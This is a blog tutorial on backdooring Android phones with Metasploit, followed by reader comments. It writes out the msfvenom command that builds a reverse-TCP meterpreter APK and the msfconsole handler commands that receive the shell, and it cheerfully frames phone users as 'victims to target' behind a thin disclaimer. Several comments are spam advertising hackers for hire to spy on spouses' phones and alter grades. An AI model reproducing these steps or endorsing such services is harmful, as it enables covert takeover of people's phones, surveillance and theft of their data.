How to Hack Android Smartphone Using Metasploit

Hello friends how are you? I hope everything is going great 😀 so what we will be talking about today is Hacking android smartphone using Metasploit.

Important : All the details shown in the article are only for educational purposes and we are not responsible for any of your acts.

Why Hack Android Phones?

So the first question that comes to our mind after hearing this is why in the world we would like to hack Android Phones? The answer to that question is really simple majority of the people out there are android users and you have a lot of victims to target 😀

But seriously don’t hack anyone’s device without their permission or you can get into a lot of trouble for doing android hacking.

What is Android?

According to Wikipedia:

Android is an operating sysytem based on Linux Kernel, and designed promarily for touchcreen mobile devices such as smartphones and tablet computers.

Initially developed by Android, Inc., which Google backed financially and later bought in 2005, Android was unveiled in 2007 along with the founding of the Open Handset Alliance: a consortium of hardware, software, and telecommunication companies devoted to advancing open standards for mobile devices

What is Metasploit?

Metasploit was created by H. D. Moore in 2003 as a portable network tool using Perl. By 2007, the Metasploit Framework had been completely rewritten in Ruby.

To put it in simple words it is an Open Source Framework, a tool for creating exploits for the remote victims and it also has a whole list of exploits readily available in Metasploit Framework.

It is the favorite tools for security researchers and ethical hackers to perform their attacks. It is super simple to create different payloads for different Operating Systems and platforms.

Metasploit for Android Hacking?

What method will be using to hack the phone? We are going to create Backdoor and install that on Victims Phone.

What is Backdoor?

A Backdoor is a method or a way of bypassing authentication in product, computer etc. They are usually used for unauthorized access to a computer.

For Android, we are going to create an APK file with a backdoor in it. Android Application Package (APK) is the file format used to distribute and install application software onto the Google’s Android OS. It is similar to the MSI package or a Deb package in Linux based operating system.

Requirements:-

  1. Metasploit Framework (Pre-Installed in Kali Linux)
  2. Victims Android Smartphone (Unfortunately that is my phone)

Step By Step Hacking Android Phone Using Metasploit:

So now lets get into it.

  1. Open Terminal.
  2. We are going to use Metasploit Venom Framework to create the exploit/backdoor for this tutorial.
  3. Use this command to generate the exploit/Backdoor for the victim.
msfvenom -p android/meterpreter/reverse_tcp LHOST=<attacker_system_ip> LPORT=4444 R > hack.apk

Generate Android Payload using msfvenom

Let me explain the above Command so we are using msfvenom  as the exploit generator for and android using Meterpreter for the reverse connection to the attackers system. LHOST defines the attackers ip address where he will get the reverse connection from the victim. And same with the LPORT connection will be made on port 4444 and R > is used to generate the executable.

MSFVenom Payload

Now we are all ready for the next step as this payload use reverse_tcp so the attacker will be listening to the port specified in the payload for a reverse connection from the victim.

So now we need to set up handler to handle incoming connections to the port let’s do it.

[email protected]:~/# msfconsole

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

Now we will listen to the connections which are being received on the attacker system.

set lhost 192.168.1.104

set lport 4444

exploit 

Remember that the LHOST & LPORT are going to be the attacker IP address and port to listen the reverse connection. and exploit to start listening.

Now as soon as the attacker installs the APK exploit/backdoor you will get the reverse meterpreter session on you terminal like this.

Here we have some information that we have extracted from the android system so the victims phone have been completely owned.

The successful hack dance  😈  😈

 

So after all this explanation what we have learned is never install apps from unknown sources 😀 or else you are completely screwed :3

Here is the Video Covering all the steps :-

 

If you had any questions do comment below and we will try our best to help you out. Do share with your friends.

  • Pingback: Top Kali Linux Tools Every Hacker Should Know About and Learn – Cyber Security Training & Ethical Hacking()

  • Pingback: New Metasploit Commands 2017 ( Improve Efficiency )()

  • Kitty

    Hey.. I installed the backdoor on my phone but nothing happened. What could be the problem?

    • just check if you have correctly set up the kali machine i on the backdoor and is the mobile on the same network because this tutorial is only for local network

  • Nelly Benson

    I spend months wondering if their are any real hacker’s, I got scared by all the news of scammer’s pretending to be hackers online, however I found a solution to that a few days ago, I contacted , (cyberwebkey484(at)gmail(dot)com) after I read about his job qualities on a group page, , (cyberwebkey484(at)gmail(dot)com) helped me defend my social media against hackers, , (cyberwebkey484(at)gmail(dot)com) has been my personal firewall after he made my Email and other platform like my facebook impossible to hack, he also gave advice that works with my credit score, I think , (cyberwebkey484(at)gmail(dot)com) is the complete full package, contact him if you need some cyberweb protection, thank me later

  • Pingback: Complete How to Guide for MSFvenom – Ethical Hacking Tutorials, Tips And Tricks()

  • Black Jack

    Hi there. I am learning about ethical hacking and love your articles. I am SUPER new to all this and have the Oracle Vm with Kali and have followed your tutorial with my own Samsung device to see how it works. When I get to the exploit stage it simply stays on the screen immediately following > exploit. Nothing seems to happen and I am wondering if it is because I haven’t got a USB wireless wifi device? I have followed a few tutorials that say Kali wont connect to my computers wireless card and I need to buy an external usb wireless adapter?? IS this maybe the issue?

    • Wanda anderson

      How To Hack Facebook and See Who’s Stalking You – Clayton Wood

  • sommer

    If you need to hack into any phone or computer, monitor someone’s communications like calls text, WhatsApp twitter, snapchat, Facebook, database, delete record, monitoring your spouse’s cheating activities, improve credit score, retrieve or spy on your partners whatsapp, text, phone, emails, bank account and many more… Just contact [email protected], he is reliable and efficient

  • LeighAnn Harkins

    Hello if you need the help of an ethical hacker urgently contact [email protected] he is the best when it comes to hacking of 1-DATABASE HACK 2-WHATS-APP HACK 3-WEBSITE HACK 4-TRACKING CALLS 5-PHONE CLONE 6-FACEBOOK HACK 7-CHANGE SCHOOL GRADE [email protected] helped me hack into my spouse phone and he was excellent in hacking my husband’s phone without physical contact.

  • Solzy

    nice ..!

  • Not Bob Dillon

    Hey mate, I just went through your whole tutorial up until the end part where I put in the exploit command and it came back saying “Handler failed to bind to (my ip address):1234:- –
    Then “Started reverse TCP handler on 0.0.0.0:1234” I have no idea what that means so if you can send a reply with some help, I would much appreciate that. TY dude

  • Not Bob Dillon

    Okay, so I fixed my earlier problem and have a new one, when I use the exploit command it does all the right things but doesn’t give me the option to write any commands and when I do try to type something it says unknown command and goes back to the “msf exploit(handler)” console, I have no idea what to do and would appreciate some help this time. Ty dude